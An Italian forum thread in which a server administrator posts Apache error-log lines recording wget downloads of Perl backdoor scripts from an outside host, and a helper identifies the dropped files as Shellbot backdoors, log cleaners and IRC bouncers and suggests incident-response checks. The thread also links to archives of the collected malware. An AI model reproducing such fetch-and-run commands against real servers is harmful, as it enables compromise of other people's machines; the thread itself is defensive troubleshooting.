strane righe su error.log di apache

[Bobo]

Nel file var/log/apache2/error.log di apache 2 trovo delle righe del tipo :

--01:45:48-- http://www.eodspr.kit.net/vna.txt
=> `vna.txt'
Resolving www.eodspr.kit.net... 201.7.184.2
Connecting to www.eodspr.kit.net[201.7.184.2]:80... connected.
HTTP request sent, awaiting response... 404 Not Found
01:45:49 ERROR 404: Not Found.

Can't open perl script "vna.txt": No such file or directory
perl: no process killed
--01:50:24-- http://www.eodspr.kit.net/botefnet.txt
=> `botefnet.txt'
Resolving www.eodspr.kit.net... 201.7.184.2
Connecting to www.eodspr.kit.net[201.7.184.2]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20,836 [text/plain]

0K .......... .......... 100% 31.18
KB/s

01:50:26 (31.18 KB/s) - `botefnet.txt' saved [20836/20836]

--02:23:57-- http://www.eodspr.kit.net/botnet.txt
=> `botnet.txt'
Resolving www.eodspr.kit.net... 201.7.184.2
Connecting to www.eodspr.kit.net[201.7.184.2]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20,856 [text/plain]

0K .......... .......... 100% 29.98
KB/s

02:23:59 (29.98 KB/s) - `botnet.txt' saved [20856/20856]


inoltre nella cartella /var/tmp ci sono dei file sospetti che non credo
c'entrino nulla col sistema.. tipo :
port.tgz
httpd
seclogstate.state

ed altri..

immagino che ci siamo dei "problemi".. ma adesso cosa posso iniziare a fare
per capire che cosa sta succedendo???
ho provato chrootkit.. e non mi ha dato nessun "pericolo"

grazie!

[Habanero]

probabilmente è un tentativo (andato a buon fine??) di eseguire qualche tipo di injection di codice...
Il sito dovrebbe essere Brasiliano (e già questo è sintomatico...) da uno dei link inoltre si cerca di scaricare una backdoor sotto forma di script perl. Kaspersky lo indica come perl.shellbot.

http://www.viruslist.com/en/search?V...erl.Shellbot.a

difficile dire cosa sia successo esattamente...
Hai altre informazioni?

[Bobo]

nella cartella /tmp del server ho rovato i seguenti file (che ho compresso per comodità)
http://www.sanromanese.it/tmp.tar.gz

mentre nella cartella /var/tmp ho trovato questi (sempre compressi come sopra)
http://www.sanromanese.it/vartmp.tar.gz

inoltre semopre nella cartella /var/tmp ho trovato delle sotto cartelle nominate "../" o "..." con all'interno dei file mp3..

ti ringrazio intanto per la risposta sopra.. sperando che tu mi possa dare altre info utili!!

[Habanero]

bene... cioè male...

quegli archivi contegono un bel po' di tools non proprio rassicuranti:

tmp\a.txt -> trojan Backdoor.Perl.Shellbot.a
tmp\httpd -> trojan Backdoor.Perl.Termapp.a
tmp\.access.log\proc -> Exploit.Linux.Small.f
tmp\.access.log\xh -> HackTool.Linux.ProcHider.a
vartmp\port.tgz/port.tar/port/65500 -> Virus.Linux.RST.b
vartmp\port.tgz/port.tar/port/4000 -> Virus.Linux.Osf.8759
vartmp\port.tgz/port.tar/port/14568 -> Backdoor.Linux.Small.i
vartmp\port.tgz/port.tar/port/35651 -> Trojan-PSW.Linux.Small.b
vartmp\.files\del -> HackTool.Linux.CleanLog.k
vartmp\.files\httpd -> Backdoor.Linux.Iroffer.14b02
vartmp\port\14568 -> Virus.Linux.Osf.8759
vartmp\port\35651 -> Virus.Linux.Osf.8759
vartmp\port\4000 -> Virus.Linux.Osf.8759
vartmp\port\65500 -> Virus.Linux.RST.b

dall'analisi sommaria dei tools ho il forte sospetto che la tua macchina sia diventata un file server IRC per file pirata e un proxy/bouncer IRC...

due dei programmi presenti:
http://iroffer.org/
http://www.psybnc.at/about.html

oltre ad una serie di eseguibili e backdoor..

insomma, secondo me non stai messo benissimo.
A cosa è adibita la macchina? è tua? vi hai accesso completo?

Per prima cosa verificherei se vi sono processi sospetti... processi riconducibili ai file in quelle cartelle. Verificherei inoltre le porte in stato di listening... se non hai installato deliberatamente un server IRC e vedi una porta 6667 allora comicerei a preoccuparmi. Verificherei anche la presenza di una eventuale porta 32587 aperta... era presente nel file di configurazione di psybnc...

Mi sembra superfluo dire che farei piazza pulita di tutti quei file. Magari conservali altrove.

Difficile dire cos'altro potrebbe esserci...

[Bobo]

sì la porta 32587 è in ascolto...
quello che non capisco è da dove sono entrati.. nessun suggerimento??? c'è pure un firewall e le uniche porte aperte all'esterno (spero!!) sono la 80 (webserver apache) e la 21 (ftp server) !!

[Habanero]

che genere di sito/siti web sono presenti? potrebbe essere una vulnerabilità di alcune pagine dinamiche. Oppure una vulnerabilità del server FTP. O ancora qualche errata configurazione...

Hai provato a dare un occhio ai log di accesso ai due server per vedere se c'è qualcosa di sospetto? anche se temo che possa non esserci più niente... se non ricordo male tra i programmi caricati doveva esserci un tool per cancellare i log....
In ogni caso vale la pena provare. Prendi come diferimento la data di salvataggio dei file sospetti.

[Bobo]

c'è apache 2 con PHP e tomcat 5 per le JSP ..
nei file log error.log di apache trovo righe tipo :

[Thu May 10 02:45:22 2007] [error] [client 66.249.72.239] File does not
perl: no process killed
--02:49:24-- http://www.eodspr.kit.net/vn.txt
=> `vn.txt'
Resolving www.eodspr.kit.net... 201.7.184.2
Connecting to www.eodspr.kit.net[201.7.184.2]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,705 [text/plain]

0K .......... .......... ......... 100% 41.57 KB/s

02:49:25 (41.57 KB/s) - `vn.txt' saved [29705/29705]

ed altre righe tipo ................

sh: line 1: sysctl: command not found
sh: line 1: sysctl: command not found

sinceramente non capisco cosa sia anche queste ultime .. comandi shell???

[Habanero]

sysctl è un comando shell per modificare parametri del kernel a run-time.


Io comuque intendevo i log di accesso non i log degli errori...

[Bobo]

ho guardato syslog, auth.log, kern.log, user.log ma non mi sembra ci sia niente di strano (per quello che ne posso capire io )...
cmq il fatto che i messaggi strani appaiono nei log di apache.. posso supporre che ci sia qualcosa che abbia "aperto" un'accesso proprio tramite apache.. (in tutta la mia ignoranza.. certo mi pare strano che da una porta 80.. che server pagine web si possa riuscire a scaricare dei file su aree del disco diverse dalla www root !! .. e poi sempre tramite apache si possano eseguire degli script sempre in locazioni diverse da www root..)
Fatto sta che in qualche maniera "hanno" attivato un server IRC .. e non riesco a capire come!!